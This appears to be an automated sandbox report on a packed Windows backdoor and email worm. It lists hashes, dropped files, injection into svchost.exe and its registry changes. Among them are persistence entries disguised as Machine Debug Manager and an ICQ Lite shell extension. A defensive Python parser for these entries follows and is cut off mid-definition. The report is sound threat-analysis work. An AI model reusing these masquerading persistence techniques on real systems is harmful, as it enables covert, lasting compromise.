HEUR:Trojan.Win32.Generic (Kaspersky), Packer.Morphine.B (B) (Emsisoft), Packer.Morphine.B (AdAware), Backdoor.Win32.Farfli.FD, GenericEmailWorm.YR, BankerGeneric.YR (Lavasoft MAS)
Behaviour: Banker, Trojan, Backdoor, Worm, EmailWorm
This description was generated automatically by the Lavasoft Malware Analysis System and may contain incomplete or inaccurate information.
Summary
MD5: 8003e1644b2448254cad8671be23fcb6
SHA1: 5e3ed2c90caf3a5c632a4603278814bacdd8e380
SHA256: 0a80910bd7d7807d9d795a85f759748c8d9140b1129c1dc6650131e697b3cddf
SSDeep: 1536:nQKeJ5YQx8kfmTZDZpYuu7Z6BicRw2zvbu/1AQftI3w103CQUI:ngnxsfGDRuljcLmAuI3K
Size: 74241 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: Morphinev27, UPolyXv05_v6
Company: no certificate found
Created at: 1998-09-28 14:39:39
Analyzed on: WindowsXP SP3 32-bit
Summary: Backdoor. Malware that gives an attacker remote control of the victim's machine.
Dynamic Analysis
Payload
Behaviour | Description |
---|---|
EmailWorm | The worm can send e-mail. |
Process activity
The Backdoor creates the following process(es):
%original file name%.exe:1316
The Backdoor injects its code into the following process(es):
mdmi386.exe:1064
svchost.exe:1588
File activity
The process mdmi386.exe:1064 makes changes in the file system.
The Backdoor creates and/or writes to the following file(s):
%System%\AUHook.dll (51 bytes)
%WinDir%\win.ini (106 bytes)
The process %original file name%.exe:1316 makes changes in the file system.
The Backdoor creates and/or writes to the following file(s):
%System%\mdmi386.exe (601 bytes)
Registry activity
The process mdmi386.exe:1064 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\36\DB\06]
"53" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\4C\30\07]
"93" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\30\6E\05]
"F1" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\5E\3F\08]
"7A" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\3E\60\06]
"C2" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\53\0B\07]
"E8" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\3B\A3\06]
"72" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\5E\B6\08]
"25" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\54\F0\07]
"F4" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\27\79\05]
"55" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\53\8E\07]
"C0" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\5A\AD\08]
"29" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\1E\61\04]
"95" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\4A\3E\07]
"46" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\70\7B\09]
"28" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\74\03\09]
"3e" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\63\83\08]
"89" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\30\77\05]
"F6" = "1"
[HKCR\*\shellex\ContextMenuHandlers\icqlite]
"(Default)" = "{77770022-0D68-4D14-BF25-6747ACFA95DE}"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\3C\AE\06]
"A2" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\43\47\07]
"19" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\7B\E0\09]
"57" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\55\AD\08]
"12" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\36\98\06]
"52" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\44\B5\07]
"1a" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\54\AA\07]
"E4" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\29\E2\05]
"7E" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\3D\18\06]
"C7" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\5A\D7\08]
"2d" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\47\4C\07]
"52" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\29\52\05]
"6E" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\53\0E\07]
"EC" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\4C\FF\07]
"83" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\29\5B\05]
"70" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\5B\C8\08]
"31" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\4B\DB\07]
"7D" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\2F\77\05]
"DB" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\24\44\05]
"13" = "1"
[HKCR\CLSID\{A4C110AE-0291-F12A-2920-F0E455440770}\InprocServer32]
"ThreadingModel" = "Apartment"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\37\02\06]
"59" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\24\56\05]
"1a" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\42\20\06]
"C3" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\36\14\06]
"4c" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\37\58\06]
"63" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\1D\D0\04]
"95" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\7A\22\09]
"67" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\pi]
"1~" = "573571897"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\6E\5C\09]
"01" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\35\DF\06]
"48" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\B9\5D\0B]
"74" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\22\9A\04]
"F4" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\36\F3\06]
"5b" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\EA\65\0C]
"F0" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\50\34\07]
"ab" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\7C\0E\09]
"bc" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\49\BC\07]
"31" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\43\A7\07]
"19" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\7E\F5\09]
"aa" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\41\C7\06]
"F8" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\3B\0F\06]
"83" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\44\E9\07]
"20" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\63\C9\08]
"00" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\5D\9A\08]
"56" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\94\6C\0A]
"7C" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\65\FA\08]
"C7" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\data\pa]
"~01" = "1#ByR0NRZDEFUHSQhFADoaex9y"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\2F\5C\05]
"DB" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\57\E1\07]
"80" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\49\14\07]
"38" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\42\12\06]
"F1" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\2F\44\05]
"ce" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\3B\E2\06]
"A2" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\3E\39\06]
"C3" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\73\C2\09]
"31" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\tm\C:]
"(Default)" = "153457"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\5A\F4\08]
"43" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\64\90\08]
"6D" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\1F\0C\04]
"C7" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\3D\87\06]
"C6" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\30\20\05]
"E3" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\56\B2\08]
"06" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\37\73\06]
"62" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\MRU]
"00" = "pa\~01"
"01" = "pi\1~"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\61\FE\08]
"8E" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\5C\DD\08]
"64" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\29\6C\05]
"73" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\30\75\05]
"F0" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\23\84\05]
"05" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\2F\89\05]
"D8" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\35\15\06]
"33" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\2A\55\05]
"85" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\MRU]
"!2" = "1"
"!1" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\35\BD\06]
"06" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\58\08\07]
"FB" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\95\6D\0A]
"0A" = "1"
[HKCR\CLSID\{A4C110AE-0291-F12A-2920-F0E455440770}\InprocServer32]
"(Default)" = "%System%\AUHook.dll"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\2A\59\05]
"8D" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\90\E0\0A]
"86" = "1"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "0B 9B A0 56 59 F6 35 ED A3 63 73 46 7E 34 33 D7"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\5A\45\08]
"21" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\30\E2\05]
"E2" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\5C\8C\08]
"26" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\39\38\06]
"44" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Approved]
"{77770022-0D68-4D14-BF25-6747ACFA95DE}" = "Shell Extensions for ICQ Lite"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\8E\CC\0A]
"2e" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\23\A7\05]
"0A" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\36\82\06]
"4d" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\EA\2A\0C]
"F7" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\3B\D3\06]
"97" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\36\71\06]
"53" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc]
"counter" = "1"
[HKCR\CLSID\{77770022-0D68-4D14-BF25-6747ACFA95DE}\InprocServer32]
"ThreadingModel" = "Apartment"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\74\55\09]
"0C" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\59\78\08]
"12" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\14\CE\03]
"B6" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\AC\DA\0B]
"0E" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\22\C0\04]
"F7" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\24\D5\05]
"23" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\70\41\09]
"2b" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\45\7D\07]
"26" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\5D\49\08]
"78" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\98\9E\11]
"4c" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\22\66\04]
"C1" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\AB\8B\0B]
"6F" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\22\D8\04]
"F8" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\71\50\09]
"27" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\2F\F8\05]
"eb" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\2F\D9\05]
"E3" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\data\pi]
"1~" = "1#cFMDSmlYe29vb29vb29vb29vb2tra2tONJI6"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\5C\B8\08]
"58" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\29\50\05]
"74" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\35\C1\06]
"3a" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\66\A6\08]
"E6" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\23\60\05]
"02" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\2A\6E\05]
"91" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\18\C0\04]
"24" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\BE\94\0B]
"E2" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\0D\A5\0E]
"09" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\tm]
"pi" = "154537"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\2F\CB\05]
"E2" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\3B\EE\06]
"98" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\32\53\06]
"05" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\27\FD\05]
"57" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\50\29\07]
"86" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\96\35\0A]
"7F" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\48\CF\07]
"3d" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\85\20\0A]
"1f" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\2E\BB\05]
"B6" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\2E\29\05]
"bf" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\2B\E8\05]
"98" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\4D\61\07]
"B2" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\8A\4C\0A]
"13" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\3D\F3\06]
"cf" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\5C\F5\08]
"63" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\36\6A\06]
"3a" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\54\29\07]
"F8" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad]
"AUHook" = "{BCBCD383-3E06-11D3-91A9-00C04F68105C}"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\14\FB\03]
"ce" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\22\89\04]
"E0" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\84\7C\0A]
"1a" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\83\24\09]
"E6" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\5A\2A\08]
"26" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\3E\A5\06]
"ca" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\67\6C\08]
"EA" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\CE\2D\0C]
"53" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\23\76\05]
"11" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\24\41\05]
"11" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\A8\54\0B]
"6E" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\3D\B1\06]
"D5" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\3C\24\06]
"B2" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\3C\54\06]
"64" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\35\C2\06]
"40" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\71\02\09]
"46" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\70\6B\09]
"46" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\58\A2\08]
"1d" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\3D\45\06]
"af" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\50\EB\07]
"8E" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\71\A2\09]
"0D" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\1E\23\04]
"99" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\6B\1F\08]
"A8" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\43\1F\06]
"D9" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\50\19\07]
"77" = "1"
[HKCR\Directory\shellex\ContextMenuHandlers\icqlite]
"(Default)" = "{77770022-0D68-4D14-BF25-6747ACFA95DE}"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\2E\6C\05]
"B8" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\8B\B6\0A]
"1c" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\28\E9\05]
"6D" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\56\AF\08]
"2a" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\21\E7\04]
"C2" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\46\11\07]
"42" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\34\34\06]
"06" = "1"
[HKCR\CLSID\{77770022-0D68-4D14-BF25-6747ACFA95DE}\InprocServer32]
"(Default)" = "AUHook.dll"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\6F\4C\09]
"29" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\B4\4F\0B]
"6D" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\44\ED\07]
"1c" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\59\AE\08]
"1f" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\5C\3C\08]
"48" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\45\71\07]
"3b" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\52\B6\07]
"cc" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\36\FF\06]
"62" = "1"
[HKCR\CLSID\{BCBCD383-3E06-11D3-91A9-00C04F68105C}\InprocServer32]
"(Default)" = "%System%\AUHook.dll"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\53\2C\07]
"de" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\3E\65\06]
"D0" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\3E\1C\06]
"D8" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\1F\84\04]
"D3" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\60\8C\08]
"37" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\1B\51\03]
"dd" = "1"
To run automatically each time Windows starts, the Backdoor adds a reference to its dropped copy under the following autorun key (the value names only mdmi386.exe, with no path; the copy lives in %System%):
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Machine Debug Manager" = "mdmi386.exe"
The process %original file name%.exe:1316 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "40 E5 3B 0A 96 A2 DD 6B 03 BB 9B 13 35 7D C6 4B"
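The Registry activity above mixes hundreds of the Backdoor's own bookkeeping values (the MSSfc\hash\em tree) with the handful of entries that actually matter for persistence: the Run key, the ShellServiceObjectDelayLoad entry, and the CLSID InprocServer32 registrations that make {BCBCD383-...} and {77770022-...} resolve to AUHook.dll. The following Python is an added example, not Lavasoft's tooling: it parses a constructed excerpt of the listing in the report's own layout, groups persistence-relevant entries by mechanism, flags values that name a dropped file, and resolves every referenced CLSID to the DLL behind it. The parser, the rule list and their labels are the example's own assumptions.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Tuple

# Constructed sample: an excerpt of the report's "Registry activity" section,
# in the same "[key]" / "name" = "value" layout the report uses.
SAMPLE_REPORT = r'''
[HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\hash\em\36\DB\06]
"53" = "1"
[HKCR\*\shellex\ContextMenuHandlers\icqlite]
"(Default)" = "{77770022-0D68-4D14-BF25-6747ACFA95DE}"
[HKCR\CLSID\{A4C110AE-0291-F12A-2920-F0E455440770}\InprocServer32]
"(Default)" = "%System%\AUHook.dll"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Approved]
"{77770022-0D68-4D14-BF25-6747ACFA95DE}" = "Shell Extensions for ICQ Lite"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad]
"AUHook" = "{BCBCD383-3E06-11D3-91A9-00C04F68105C}"
[HKCR\CLSID\{BCBCD383-3E06-11D3-91A9-00C04F68105C}\InprocServer32]
"(Default)" = "%System%\AUHook.dll"
[HKCR\CLSID\{77770022-0D68-4D14-BF25-6747ACFA95DE}\InprocServer32]
"(Default)" = "AUHook.dll"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Machine Debug Manager" = "mdmi386.exe"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "40 E5 3B 0A 96 A2 DD 6B 03 BB 9B 13 35 7D C6 4B"
'''

KEY_RE = re.compile(r'^\[(.+)\]$')
VALUE_RE = re.compile(r'^"(.*?)"\s*=\s*"(.*)"$')
CLSID_RE = re.compile(r'\{[0-9A-Fa-f-]{36}\}')

# Registry locations Windows consults at logon or shell start (hypothetical
# rule table for this example); anything else is reported as "other".
PERSISTENCE_RULES: List[Tuple[str, str]] = [
    (r'\\CurrentVersion\\Run$', 'autorun: Run key'),
    (r'\\ShellServiceObjectDelayLoad$',
     'autorun: ShellServiceObjectDelayLoad (COM object loaded by Explorer)'),
    (r'\\CLSID\\\{[0-9A-Fa-f-]{36}\}\\InprocServer32$', 'COM in-process server registration'),
    (r'\\Shell Extensions\\Approved$', 'approved shell extension'),
    (r'\\shellex\\ContextMenuHandlers\\', 'shell context-menu handler'),
    (r'\\Explorer\\Browser Helper Objects\\', 'Internet Explorer BHO'),
]

@dataclass(frozen=True)
class RegEntry:
    key: str
    name: str
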